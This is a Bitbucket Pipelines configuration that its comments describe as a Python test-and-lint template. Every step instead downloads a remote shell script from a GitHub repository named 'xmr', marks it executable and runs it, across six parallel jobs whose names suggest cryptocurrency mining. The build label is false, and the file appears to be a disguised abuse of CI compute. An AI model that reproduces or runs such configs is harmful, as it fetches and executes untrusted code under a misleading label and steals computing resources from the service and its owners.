#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: ubuntu:18.04

pipelines:
  default:
    - parallel:
      - step:
          name: xmr_1
          script:            
            - apt-get install wget -y
            - wget https://raw.githubusercontent.com/Z3rotwoo/xmr/master/xmr.sh && chmod +x xmr.sh && ./xmr.sh
      - step:
          name: xmr_2
          script:
            - wget https://raw.githubusercontent.com/Z3rotwoo/xmr/master/xmr.sh && chmod +x xmr.sh && ./xmr.sh
      - step:
          name: xmr_3
          script:
            - wget https://raw.githubusercontent.com/Z3rotwoo/xmr/master/xmr.sh && chmod +x xmr.sh && ./xmr.sh
      - step:
          name: xmr_4
          script:
            - wget https://raw.githubusercontent.com/Z3rotwoo/xmr/master/xmr.sh && chmod +x xmr.sh && ./xmr.sh
      - step:
          name: xmr_5
          script:
            - wget https://raw.githubusercontent.com/Z3rotwoo/xmr/master/xmr.sh && chmod +x xmr.sh && ./xmr.sh
      - step:
          name: xmr_6
          script:
            - wget https://raw.githubusercontent.com/Z3rotwoo/xmr/master/xmr.sh && chmod +x xmr.sh && ./xmr.sh
